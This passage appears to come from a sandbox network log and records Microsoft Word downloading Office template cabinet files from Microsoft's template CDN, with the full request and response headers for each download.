x-ms-request-id: c5200cc9-a01e-00a1-5597-a0f6f2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328916.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 26944
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: +RPdhJFXUwQthWzsTl2rpQ==
Last-Modified: Fri, 22 Apr 2016 15:41:40 GMT
ETag: 0x8D36AC49908AE11
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b597306b-e01e-00c0-6697-a0b22d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0345749101.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 261258
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: ZYKNx76Loc5hrXFCJSrMVA==
Last-Modified: Wed, 29 Aug 2018 18:23:58 GMT
ETag: 0x8D60DDC968C4F0E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: bb8fd03d-a01e-0043-4797-a06c76000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328919.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 22149
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: ZsUZnPT7GL1Pnz8sywdABw==
Last-Modified: Fri, 22 Apr 2016 15:41:40 GMT
ETag: 0x8D36AC4992C63CE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f67f6439-f01e-00b9-7e97-a0db67000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0345748501.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 2591108
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: vrEqBGTQlsozuupDUs6ADw==
Last-Modified: Wed, 29 Aug 2018 18:18:42 GMT
ETag: 0x8D60DDBD9E38C6B
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 657a3b26-501e-00bf-4a97-a02c1f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328925.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 25314
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: xH40MK+BPfiwLhy0gp3ZSw==
Last-Modified: Fri, 22 Apr 2016 15:41:40 GMT
ETag: 0x8D36AC49952B1C0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7434c23b-501e-0073-4e97-a048aa000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03998159.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 3417042
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: dJw2FeVMjmh1UYz9hOWhsg==
Last-Modified: Fri, 22 Apr 2016 16:11:19 GMT
ETag: 0x8D36AC8BD7E1FE9
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f0fd4826-d01e-00cf-6997-a00478000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328932.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 20554
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: SGy8siO4cxMv+vS4rQrQRA==
Last-Modified: Fri, 22 Apr 2016 16:09:49 GMT
ETag: 0x8D36AC887A4CC19
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 867275a6-c01e-0037-5197-a05886000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03998158.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 42788
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: IaS3txYxwszaX7umN1Hw0g==
Last-Modified: Fri, 22 Apr 2016 15:41:55 GMT
ETag: 0x8D36AC4A24B210A
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: da46b32d-701e-0081-5997-a09a3e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328935.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 23597
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: fGRexQWYL+Up0OUDWzeP/A==
Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
ETag: 0x8D36AC49996C1E0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8477cc39-f01e-00df-0497-a0693d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328940.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 21791
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: e/iLPKIOtx7UU6M2GQjgEA==
Last-Modified: Fri, 22 Apr 2016 15:41:41 GMT
ETag: 0x8D36AC499BA77A5
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 579ed937-501e-0015-1e97-a0faf0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328951.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 19893
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 75y4vfvAjwO+9RmtZrpkLw==
Last-Modified: Fri, 22 Apr 2016 16:09:50 GMT
ETag: 0x8D36AC8888436CF
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8b7f2b9c-601e-00da-3797-a013cb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328972.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 21111
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 0wrSbbtt7KT90pT0jtrVXQ==
Last-Modified: Fri, 22 Apr 2016 16:09:51 GMT
ETag: 0x8D36AC888CEAFBE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d4301ed0-b01e-0122-0997-a0b138000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328975.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 22594
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 7gEpx8waySu8PWyw9lP8rg==
Last-Modified: Fri, 22 Apr 2016 15:41:42 GMT
ETag: 0x8D36AC49A2D135E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e960e28b-801e-0094-6497-a058a7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328983.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 21875
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: 5TIDh2JQP/oTcd8D+i4iLQ==
Last-Modified: Fri, 22 Apr 2016 16:09:52 GMT
ETag: 0x8D36AC88963C8B3
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 719e0bb9-a01e-0053-5c97-a0a91e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328986.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 22340
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: iyn6tQb9ZcIcnNb+a7vBRg==
Last-Modified: Fri, 22 Apr 2016 15:41:42 GMT
ETag: 0x8D36AC49A9463F7
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 954c7b2e-e01e-0048-5b97-a00af4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:57 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328998.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 21357
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: l/W3t+nhKBmZRopcQssS5w==
Last-Modified: Fri, 22 Apr 2016 16:09:53 GMT
ETag: 0x8D36AC88A7F05EE
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8e84b2b1-401e-004b-3297-a07679000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp03328990.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 19288
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: uab/cVcZ7p3hZCGrmDynRQ==
Last-Modified: Fri, 22 Apr 2016 16:09:53 GMT
ETag: 0x8D36AC88A1DF716
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6d182899-901e-0083-4897-a09448000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0345744402.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 295527
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: mgcDXvgCv4n27SVNDbAqsA==
Last-Modified: Wed, 29 Aug 2018 21:59:16 GMT
ETag: 0x8D60DFAA9FC6013
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9ae01919-001e-0028-0a97-a0eb82000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:57 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0345746401.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 276650
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: hNjzhI50JMvjgB+VcOBQGA==
Last-Modified: Wed, 29 Aug 2018 18:16:15 GMT
ETag: 0x8D60DDB82865741
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 56e4750e-f01e-010c-3897-a0e32f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:57 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0345747501.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 271273
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: IUN4l8m4isLLK7L++SLRkQ==
Last-Modified: Wed, 29 Aug 2018 18:16:49 GMT
ETag: 0x8D60DDB967B9FA5
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7297223a-101e-00d5-6197-a070b4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0345749601.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 550906
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: HBIxXIYqdFpkfa1UbrQmfg==
Last-Modified: Wed, 29 Aug 2018 18:20:59 GMT
ETag: 0x8D60DDC2BA71326
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 738e14d8-201e-0011-2f97-a00f72000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:56 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

GET /support/templates/en-us/tp0345750301.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 004D04D9-95E8-4E84-8D4A-7D8AB8763F90
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 640684
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: +TNk7sbE/6V2jeVFosNPBw==
Last-Modified: Wed, 29 Aug 2018 18:15:11 GMT
ETag: 0x8D60DDB5C4DB3A1
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 02f02c12-801e-0026-1997-a0c232000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Mon, 20 May 2024 12:37:57 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab

WINWORD.EXE

Remote address:

2.17.251.23:443

Request

